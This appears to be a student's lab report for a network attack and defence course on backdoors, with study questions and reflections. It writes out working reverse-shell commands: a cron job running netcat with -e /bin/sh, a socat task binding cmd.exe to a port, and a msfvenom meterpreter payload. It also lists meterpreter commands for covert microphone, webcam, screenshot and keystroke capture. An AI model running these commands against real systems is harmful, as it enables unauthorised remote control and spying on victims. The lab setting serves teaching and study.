实验预习

  • 后门: 指绕过安全控制而获取对程序或系统访问权的方法。最主要目的就是方便以后再次秘密进入或者控制系统。
  • 木马与后门的区别:
    • 木马:通过欺骗用户的方法(包含捆绑,利用网页等)让用户不知不觉的安装到系统中的一类软件,主要功能有远程控制,盗密码等,具有欺骗性。
    • 区别:后门和木马的区别就是它更注重隐蔽性但是没有欺骗性,因此它的危害性没有木马大。

实验内容

常用后门工具

ncat: netcat能通过TCP和UDP在网络中读写数据,通过与其他工具结合和重定向。

  • 端口扫描:

    • Win获得Linux Shell

      a. 在win下查看IP地址

      b. 使用ncat.exe程序监听本机的5229端口

      c. 在Kali下,使用nc -e命令反弹连接Win的5229端口

      d. win下获得一个linux shell,可运行任何指令,如ls

    • Linux获得Win Shell

      a. 查看kali的IP

      b. kali中使用nc指令监听5229端口

      c. 在Win下,使用ncat.exe -e命令选项反弹连接Kali主机的5229端口

      d. kali下看到Win的命令提示

  • 数据传输:

    • Win下监听5229端口

    • Kali下连接到Win的5229端口

  • 文件传输:

    • 在win中打开监听,在kali中发送文件





Meterpreter

1.使用netcat获取主机操作Shell,cron启动

crontab: 用来让使用者在固定时间或固定间隔执行程序的指令。

参数:
-e [UserName]: 执行文字编辑器来设定时程表,内定的文字编辑器是 VI,如果你想用别的文字编辑器,则请先设定 VISUAL 环境变数来指定使用那个文字编辑器(比如说 setenv VISUAL joe)
-r [UserName]: 删除目前的时程表
-l [UserName]: 列出目前的时程表
-v [UserName]:列出用户cron作业的状态
  • Win下,监听5229端口

  • crontab -e指令编辑定时任务

  • 在最后一行添加&& * * * * /bin/netcat 192.168.126.129 5229 -e /bin/sh,意思是在每个小时的第&&分钟反向连接Win主机的5229端口

  • 当时间到了&&时,此时已经获得了Kali的shell

2.使用socat获取主机操作Shell, 任务计划启动

socat: 可以看做netcat的加强版。
  • Win->控制面板->管理工具->任务计划程序

    • 新建任务计划

      1 .触发器:当锁定任何用户的工作站时

      2 .操作->程序或脚本:c:\ncat\ncat.exe

      3 .操作->添加参数:

      tcp-listen:5229 exec:cmd.exe,pty,stderr

      将cmd.exe绑定到端口5229,同时把cmd.exe的stderr重定

      向到stdout上

      4 .运行新建的任务

      5 .在Kali环境下输入指令socat - tcp:192.168.126.129:5229,此时已经成功获得了一个cmd shell

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 创建后门文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.128 LPORT=5229 -f exe > 20155229_backdoor.exe

  • nc指令将后门程序传送到Win:

  • Kali中使用msfconsole指令进入msf控制台,打开监听进程,设置payload,设置反弹回连的IP和端口:



其实我没太懂为什么输入msfconsole命令后会出现类似下图《小马宝丽》动画片里的生物,可能是设计者有一颗少女心(童心)吧。。。囧

  • 进行监听

  • 运行win中的后门程序

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • record_mic指令可以截获一段音频

  • webcam_snap指令可以使用摄像头进行拍照





  • screenshot指令可以进行截屏:

  • keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录


基础问题问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 后门在软件开发过程中被引入,发布室被忽视,在下载该软件时,自动的被安装在主机中。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • win:新建任务触发器
  • linux:cron定时触发

(3)Meterpreter有哪些给你映像深刻的功能?

  • 能够捕获音频,利用摄像头拍照等一些列能够获取我们隐私的操作。(可以说是日常恐慌了。。。)

(4)如何发现自己有系统有没有被安装后门?

  • 可以使用一些杀毒软件对主机进行查杀;对防火墙、端口等设施进行检查。

实验中遇到的问题及解决

问题一:输入webcam_snap之后出现以下错误提示

想起自己使用的是虚拟机win7进行的实验,所以在win7中设备查找是否有图像设备,答案是没有。然后将电脑上的摄像头连接到虚拟机中。再次执行webcam_snap该命令,虚拟机能够进行拍照。


实验总结与体会

本次实验在开始做之前先了解了一些相关的知识,看起来有些枯燥,但开始动手做实验后,发现了本次实验的魅力,尤其是看到了“小马宝丽”还有录音、拍照、读取击键的记录等结果后,但也觉得能够看到别人在做什么,反想到我们现在在电脑上的一举一动可能也被别人监视着就很恐慌。所以这次实验也给我提了一个很大的醒,哪怕是百度过关的软件,那也不能下载,因为不知道那上面会不会有隐藏的后门、木马等附在软件中。

20155229《网络对抗技术》Exp2:后门原理与实践的更多相关文章

  1. 2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践

    2019-2020-2 20175226 王鹏雲 网络对抗技术 Exp2 后门原理与实践 实验内容 使用netcat获取主机操作Shell,cron启动: 使用socat获取主机操作Shell, 任务 ...

  2. 20155326刘美岑 《网络对抗》Exp2 后门原理与实践

    20155326刘美岑 <网络对抗>Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...

  3. 20155320《网络对抗》Exp2 后门原理与实践

    20155320<网络对抗>Exp2 后门原理与实践 [实验内容] (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, ...

  4. 20155324《网络对抗》Exp2 后门原理与实践

    20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...

  5. 20155208徐子涵《网络对抗》Exp2 后门原理与实践

    20155208徐子涵<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 答:当我们在非官方网站上下载软件时,后门极有可能会进入我们 ...

  6. 20145236《网络对抗》Exp2 后门原理与实践

    20145236<网络对抗>Exp2 后门原理与实践 目录: 一.基础问题回答 二.常用后门工具实践 2.1 Windows获得Linux Shell 2.2 Linux获得Windows ...

  7. 20155202 张旭《网络对抗》Exp2 后门原理与实践

    20155202 张旭<网络对抗>Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 捆绑在软件中 注入在可执行文件里 注入在office文件的宏里面 ...

  8. 20155218《网络对抗》Exp2 后门原理与实践

    20155218<网络对抗>Exp2 后门原理与实践 常用后门工具实践 1.Windows获得Linux Shell: 在Windows下,先使用ipconfig指令查看本机IP,使用nc ...

  9. 20155227《网络对抗》Exp2 后门原理与实践

    20155227<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在非官方网站下载软件时,后门很可能被捆绑在软件中. 攻击者利用欺 ...

  10. 20155232《网络对抗》Exp2 后门原理与实践

    20155232<网络对抗>Exp2 后门原理与实践 问题回答 1.例举你能想到的一个后门进入到你系统中的可能方式? 通过网页上弹出来的软件自动安装 2.例举你知道的后门如何启动起来(wi ...

随机推荐

  1. 解读 --- 基于微软企业商务应用平台 (Microsoft Dynamics 365) 之上的人工智能 (AI) 解决方案

    9月25日微软今年一年一度的Ignite 2017在佛罗里达州奥兰多市还是如期开幕了.为啥这么说?因为9月初五级飓风厄玛(Hurricane Irma) 在佛罗里达州登陆,在当地造成了挺大的麻烦.在这 ...

  2. 关于网站开发中div标签中设置宽度后其中文本溢出的原因和解决方法

    一.问题产生的原因 当我们为div标签声明了宽度,但是仍然会出现文本越界的情况,不知道大家有没有发现,只有文本内容为单词或者纯数字的时候才会出现这种情况为此我特意测试了两种情况,结果如下: ①当文本内 ...

  3. Android网络编程系列之HTTP协议原理总结

    前言 作为搞移动开发的我们,免不了与网络交互打交道.虽然市面上很多开源库都封装的比较到位,我们实现网络访问也轻车熟路.但还是十分有必要简要了解一下其中的原理,以便做到得心应手,也是通往高级开发工程师甚 ...

  4. Python+Selenium笔记(十七):操作cookie

    (一)方法 方法 简单说明 add_cookie(cookie_dict) 在当前会话中添加cookie信息 cookie_dict:字典,name和value是必须的 delete_all_cook ...

  5. 使用IDEA创建Java Web项目并部署

    前面给大家介绍了IDEA的安装和基本配置,睡觉前Alan再给大家分享一下使用IDEA创建Java Web并部署访问. 打开IDEA,File>New>Project,进入Java Ente ...

  6. the database needs something to populate existing rows.

    这是我在使用Django进行models编写时的一个错误. 解决办法: 为其指定一个默认值即可 object_id = models.CharField(max_length=50, default= ...

  7. Python之生成器(generator)和迭代器(Iterator)

    generator 生成器generator:一边循环一边计算的机制. 生成器是一个特殊的程序,可以被用于控制循环的迭代行为.python中的生成器是迭代器的一种,使用yield返回值函数,每次调用y ...

  8. md5sum 和 sha256sum用于 验证软件完整性

    md5sum 和 sha256sum 都用来用来校验软件安装包的完整性,本次我们将讲解如何使用两个命令进行软件安装包的校验: sha 是什么?        sha 为 安全散列算法(英语:Secur ...

  9. python设计模式之工厂模式

    一.理解工厂模式 在面向对象编程中,术语“工厂”表示一个负责创建替他类型对象的类.通常情况下,作为一个工厂的类有一个对象以及与它关联的多个方法.客户端使用某些参数调用此方法,之后,工厂会据此创建所需类 ...

  10. Linux每日小技巧---统计服务器IP连接数

    netstat命令 [root@:vg_adn_tidbCkhsTest:172.31.30.62 ~]#netstat -tun | awk '{print $5}' | cut -d: -f1 | ...